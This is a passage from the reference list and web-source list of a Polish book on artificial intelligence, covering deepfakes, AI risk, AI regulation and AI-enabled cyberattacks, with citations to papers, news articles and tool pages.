dzieki-sztucznej-inteligencji-Jest-eksponatem-w-swoim-muzeum-i-robi-sobie-
selfie-z-goscmi-31723 .
116. Turing A.M., Computing Machinery and Intelligence, Mind, Volume LIX,
Issue 236, October 1950433–460, https://doi.org/10.1093/mind/LIX.236.433.
117. Turing A.M., On Computable Numbers with an Applikation to the
Entscheidungsproblem, Proceedings of the London Mathematical Society,
1936, series 2, nr 42/3-42/4. Przedruk w: Davis M. (ed.), The Undecidable
Propositions, Unsolvable Problems, and Computable Functions, Raven Press,
Hewlett, NY 1965116-153
118. Uczenie głębokie a uczenie maszynowe w usłudze Azure Machine Learning,
Microsoft, 27 sierpnia 2022, https://docs.microsoft.com/pl-pl/azure/machine-
learning/concept-deep-learning-vs-machine-learning
119. Wakefield J., Deepfake presidents used in Russia-Ukraine war, bbc.com, 18
marca 2022, https://www.bbc.com/news/technology-60780142
120. Walsh T., To żyje! Sztuczna inteligencja od logicznego fortepianu po zabójcze
roboty, PWN Warszawa 201862 i 54-69
121. Wan A., Wallace E., Shen S., Klein D., Poisoning language models during
instruction tuning. In Proceedings of the 40th International Conference on
Machine Learning (ICML'23), 1 May 2023,
https://doi.org/10.48550/arXiv.2305.00944
122. Wasiuta O., Wasiuta S., Deepfake jako skomplikowana i głęboko fałszywa
rzeczywistość, Annales Universitatis Paedagogicae Cracoviensis, Studia de
Securitate 2019, nr 9(3)19-30, https://doi.org/10.24917/26578549.9.3.2
123. Waterson J., Facebook refuses to delete fake Pelosi video spread by Trump
supporters, The Guardian, 24 maja 2019,
https://www.theguardian.com/technology/2019/may/24/facebook-leavesfake-
nancy-pelosi-video-on-site
299
124. Wiggers K., MIT researchers: Amazon’s Rekognition shows gender and ethnic
bias (updated), VG KPMG, 24 stycznia 2019,
https://venturebeat.com/ai/amazon-rekognition-bias-mit/
125. Wniosek Rozporządzenia Parlamentu Europejskiego i Rady ustanawiające
zharmonizowane przepisy dotyczące sztucznej inteligencji (akt w sprawie
sztucznej inteligencji) i zmieniające niektóre akty ustawodawcze https://eur-
lex.europa.eu/legal-content/PL/ALL/?uri=CELEX:52021PC0206
126. Wordliczek Ł., Wykorzystanie sztucznych sieci neuronowych w badaniach
politologicznych, PWN 2021, s.32-35;
127. Wu Q., He K., Chen X., Personalized Federated Learning for Intelligent IoT
Applications: A Cloud-Edge Based Framework, IEEE Open Journal of the
Computer Society 2020, vol. 1, s, 35-44, doi: 10.1109/OJCS.2020.2993259;
128. Wyrwał M., Sztuczna inteligencja na wojnie. Jak Ukraińcy odkryli wszystkie
rosyjskie cele, Onet.pl, 13 września 2022,
https://www.onet.pl/informacje/onetwiadomosci/sztuczna-inteligencja-na-
wojnie-jak-ukraincy-odkryli-rosyjskie-cele/xljzxkh,79cfc278
129. Wyrwał M., Wojna w Ukrainie. Jak sztuczna inteligencja zabija Rosjan,
Onet.pl, 13 lipca 2022, https://wiadomosci.onet.pl/tylko-w-onecie/rozwiazali-
problem-armii-ukrainy-ich-pomysl-okazal-sie-dla-rosjan-zabojczy/pkzrk0z ;
130. Yampolskiy R.V., Taxonomy of pathways to dangerous AI, w materiałach 2nd
International Workshop on AI, Ethics and Society (AIEthicsSociety2016),
Phoenix, 12-13 lutego 2016143-148, https://arxiv.org/pdf/1511.03246
131. Yampolskiy R.V., Unpredictability of AI, 29 maja 2019,
https://doi.org/10.48550/arXiv.1905.13053
132. Zalecenie Rady OECD w sprawie Sztucznej Inteligencji OECD/LEGAL/0449,
https://legalinstruments.oecd.org/en/instruments/OECD-LEGAL-0449
133. Zalewski T., Definicja sztucznej inteligencji, [w:] Lai L., Świerczyński M.
(red.), Prawo sztucznej inteligencji, CHBeck 20201
134. Zeitchik S., Ready or not, mass video deepfakes are coming, The Washington
Post, 30 sierpnia 2022,
https://www.washingtonpost.com/technology/2022/08/30/deep-fake-video-on-
agt/
135. Zetter K., Wiseguys Plead Guilty in Ticketmaster Captcha Case, Wired, 18
listopada 2010, https://www.wired.com/2010/11/wiseguys-plead-guilty/
136. Zhang R., Chen X., Lu J., Wen S., Nepal S., Xiang Y., Using AI to Hack IA: A
New Stealthy Spyware Against Voice Assistance Functions in Smart Phones,
16 maja 2018, https://doi.org/10.48550/arXiv.1805.06187
137. Zouave E., Bruce M., Colde K., Jaitner M., Rodhe I., Gustafsson T., Artificially
intelligent cyberattacks, Total Defense Research Institute FOI 2020,
https://www.statsvet.uu.se/digitalAssets/769/c_769530-l_3-k_rapport-foi-
vt20.pdf
138. Żakowski J., Jak politycy wykorzystują algorytmy, by zdobyć nasze głosy,
Polityka, 17 stycznia 2017,
https://www.polityka.pl/tygodnikpolityka/spoleczenstwo/1690344,1,jak-
politycy-wykorzystuja-algorytmy-by-zdobyc-nasze-glosy.read
300
NETOGRAFIA
1. https://apnews.com/hub/not-real-news
2. https://cert.pl/posts/2020/03/analiza-bota-mirai-oraz-jego-wariantow/
3. https://developer.amazon.com/en-US/alexa
4. https://doi.org/10.6028/NIST.IR.8269-draft
5. https://faculty.ai/blog/what-is-ai-safety/
6. https://github.com/features/copilot (The world’s most widely adopted AI
developer tool),
7. https://github.com/OWASP/www-project-automated-threats-to-web-
applications/tree/master/assets/files/EN
8. https://hashcat.net/hashcat/
9. https://history.computer.org/pioneers/parker-db.html
10. https://trafficwatchdog.pl/pl/articles/58/gpt-3-najnowsze-dzielo-openai-
nabralo-setki-internautow-artykuly-tworzone-przez-sztuczna-inteligencje-
spotkaly-sie-ze-swietnym-odbiorem-nieswiadomych-niczego-czytelnikow
11. https://www.coe.int/en/web/artificial-intelligence/home
12. https://www.dropbox.com/s/6iw6fbh07aiqt01/XEvilDemo_3.0.2.113.rar
13. https://www.openwall.com/john/
14. https://youtu.be/cQ54GDm1eL0
15. https://youtu.be/P2uZF-5F1wI